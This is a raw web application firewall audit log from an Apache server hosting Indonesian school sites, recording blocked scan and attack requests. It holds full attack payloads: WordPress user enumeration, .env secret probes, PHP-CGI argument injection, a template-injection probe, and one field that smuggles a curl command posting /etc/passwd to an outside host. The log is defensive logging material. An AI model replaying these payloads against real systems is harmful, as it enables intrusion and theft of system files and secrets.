1747962459262942 8201 (- - -) Stopwatch2: 1747962459262942 8201; combined=6252, p1=527, p2=5551, p3=0, p4=0, p5=105, sr=107, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3208c82e-Z-- --392eeb19-A-- [23/May/2025:08:35:14 +0700] aC_Q0h67_KloOut96EnfBgAAAJc 103.236.140.4 40694 103.236.140.4 8181 --392eeb19-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 201.76.191.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 201.76.191.240 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --392eeb19-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --392eeb19-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747964114904806 2621 (- - -) Stopwatch2: 1747964114904806 2621; combined=1301, p1=434, p2=837, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --392eeb19-Z-- --b7187659-A-- [23/May/2025:08:40:48 +0700] aC_SIG_WNRyhaqaKDLwiiwAAANg 103.236.140.4 40730 103.236.140.4 8181 --b7187659-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 36.88.104.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 36.88.104.58 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b7187659-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b7187659-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747964448409898 2831 (- - -) Stopwatch2: 1747964448409898 2831; combined=1263, p1=441, p2=788, p3=0, p4=0, p5=34, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b7187659-Z-- --07e53e30-A-- [23/May/2025:09:05:25 +0700] aC_X5R67_KloOut96EnfHAAAAI8 103.236.140.4 40968 103.236.140.4 8181 --07e53e30-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 167.71.81.114 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 167.71.81.114 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --07e53e30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --07e53e30-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747965925965448 683 (- - -) Stopwatch2: 1747965925965448 683; combined=266, p1=228, p2=0, p3=0, p4=0, p5=38, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --07e53e30-Z-- --5936557b-A-- [23/May/2025:09:08:54 +0700] aC_YtlYzwfxII7zMfyHfCAAAAA0 103.236.140.4 41004 103.236.140.4 8181 --5936557b-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15 Accept: */* Accept-Language: en X-Forwarded-For: 154.26.179.43, 103.236.140.4 Cookie: X-Varnish: 159432884 --5936557b-C-- --5936557b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5936557b-E-- --5936557b-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747966134364484 4241 (- - -) Stopwatch2: 1747966134364484 4241; combined=2306, p1=519, p2=1756, p3=0, p4=0, p5=31, sr=83, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5936557b-Z-- --a9374a60-A-- [23/May/2025:09:08:55 +0700] aC_Yt1YzwfxII7zMfyHfCQAAAA8 103.236.140.4 41010 103.236.140.4 8181 --a9374a60-B-- POST /index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Accept: */* Accept-Language: en X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 162994941 --a9374a60-C-- --a9374a60-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a9374a60-E-- --a9374a60-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1747966135103040 2871 (- - -) Stopwatch2: 1747966135103040 2871; combined=1716, p1=358, p2=1330, p3=0, p4=0, p5=28, sr=85, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a9374a60-Z-- --c30f236b-A-- [23/May/2025:09:08:55 +0700] aC_Yt1YzwfxII7zMfyHfCgAAABI 103.236.140.4 41014 103.236.140.4 8181 --c30f236b-B-- POST /test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* Accept-Language: en X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 159432887 --c30f236b-C-- --c30f236b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c30f236b-E-- --c30f236b-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1747966135854070 2122 (- - -) Stopwatch2: 1747966135854070 2122; combined=1252, p1=268, p2=964, p3=0, p4=0, p5=20, sr=48, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c30f236b-Z-- --a91d450d-A-- [23/May/2025:09:08:56 +0700] aC_YuFYzwfxII7zMfyHfCwAAABE 103.236.140.4 41018 103.236.140.4 8181 --a91d450d-B-- POST /test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0 Accept: */* Accept-Language: en X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 162994944 --a91d450d-C-- --a91d450d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a91d450d-E-- --a91d450d-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747966136593251 2889 (- - -) Stopwatch2: 1747966136593251 2889; combined=1650, p1=349, p2=1271, p3=0, p4=0, p5=30, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a91d450d-Z-- --c30f236b-A-- [23/May/2025:09:17:12 +0700] aC_aqLz70bfNdlplZZO0IgAAAEc 103.236.140.4 41094 103.236.140.4 8181 --c30f236b-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 206.189.95.232 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 206.189.95.232 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --c30f236b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c30f236b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747966632309981 886 (- - -) Stopwatch2: 1747966632309981 886; combined=355, p1=325, p2=0, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c30f236b-Z-- --e38d036f-A-- [23/May/2025:09:42:11 +0700] aC_gg7z70bfNdlplZZO0MQAAAFI 103.236.140.4 41254 103.236.140.4 8181 --e38d036f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 36.93.224.189 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 36.93.224.189 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e38d036f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e38d036f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747968131179098 3388 (- - -) Stopwatch2: 1747968131179098 3388; combined=1512, p1=513, p2=968, p3=0, p4=0, p5=31, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e38d036f-Z-- --10fea055-A-- [23/May/2025:09:50:22 +0700] aC_ibh67_KloOut96EnfOwAAAIQ 103.236.140.4 41352 103.236.140.4 8181 --10fea055-B-- GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Egs.addErrorMessage(1337*1337);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/115.0 Safari/537.36 Cookie: X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 159432971 --10fea055-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --10fea055-E-- --10fea055-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:.{0,399}?(?:@[i\\\\]|(?:[:=]|&#x?0*(?:58|3A|61|3D);?).{0,399}?(?:[(\\\\]|&#x?0*(?:40|28|92|5C);?)))" at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "95"] [id "212880"] [rev "4"] [msg "COMODO WAF: IE XSS Filters - Attack Detected.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 154.26.179.43 found within MATCHED_VAR: "] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747968622181537 2519 (- - -) Stopwatch2: 1747968622181537 2519; combined=1052, p1=383, p2=634, p3=0, p4=0, p5=35, sr=69, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10fea055-Z-- --dd29ab37-A-- [23/May/2025:10:03:26 +0700] aC_lfrz70bfNdlplZZO0QAAAAFE 103.236.140.4 41486 103.236.140.4 8181 --dd29ab37-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.79.115.132 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.79.115.132 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --dd29ab37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dd29ab37-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747969406010317 2769 (- - -) Stopwatch2: 1747969406010317 2769; combined=1395, p1=453, p2=910, p3=0, p4=0, p5=31, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dd29ab37-Z-- --5ef86b38-A-- [23/May/2025:10:07:35 +0700] aC_mdx67_KloOut96EnfQgAAAJI 103.236.140.4 41508 103.236.140.4 8181 --5ef86b38-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 182.70.126.103 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.70.126.103 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5ef86b38-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5ef86b38-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747969655722792 2939 (- - -) Stopwatch2: 1747969655722792 2939; combined=1291, p1=434, p2=828, p3=0, p4=0, p5=29, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ef86b38-Z-- --d1e2dd77-A-- [23/May/2025:10:13:24 +0700] aC_n1Lz70bfNdlplZZO0SQAAAEk 103.236.140.4 41538 103.236.140.4 8181 --d1e2dd77-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 178.128.219.116 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 178.128.219.116 X-Forwarded-Proto: http Connection: close Accept: */* User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 --d1e2dd77-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d1e2dd77-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747970004016665 850 (- - -) Stopwatch2: 1747970004016665 850; combined=344, p1=299, p2=0, p3=0, p4=0, p5=45, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d1e2dd77-Z-- --debc6561-A-- [23/May/2025:10:16:10 +0700] aC_oem_WNRyhaqaKDLwiugAAAMA 103.236.140.4 41562 103.236.140.4 8181 --debc6561-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 138.118.141.71 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 138.118.141.71 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --debc6561-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --debc6561-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747970170049488 2816 (- - -) Stopwatch2: 1747970170049488 2816; combined=1256, p1=429, p2=797, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --debc6561-Z-- --9aed371a-A-- [23/May/2025:10:20:42 +0700] aC_pilYzwfxII7zMfyHfRgAAAAo 103.236.140.4 41606 103.236.140.4 8181 --9aed371a-B-- POST /v1/api HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 193 User-Agent: Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43, 103.236.140.4 Cookie: X-Varnish: 162995131 --9aed371a-C-- action=list_flightpath_destination_instances&CID=anything_goes_here&account_name=1®ion=1&vpc_id_name=1&cloud_type=1|$(curl+-X+POST+-d+@/etc/passwd+d0mbkqa4kqtm561jt3n0b7ki5sir8r4wa.oast.fun) --9aed371a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9aed371a-E-- --9aed371a-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /v1/api"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747970442267018 1545 (- - -) Stopwatch2: 1747970442267018 1545; combined=501, p1=291, p2=140, p3=0, p4=0, p5=70, sr=46, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 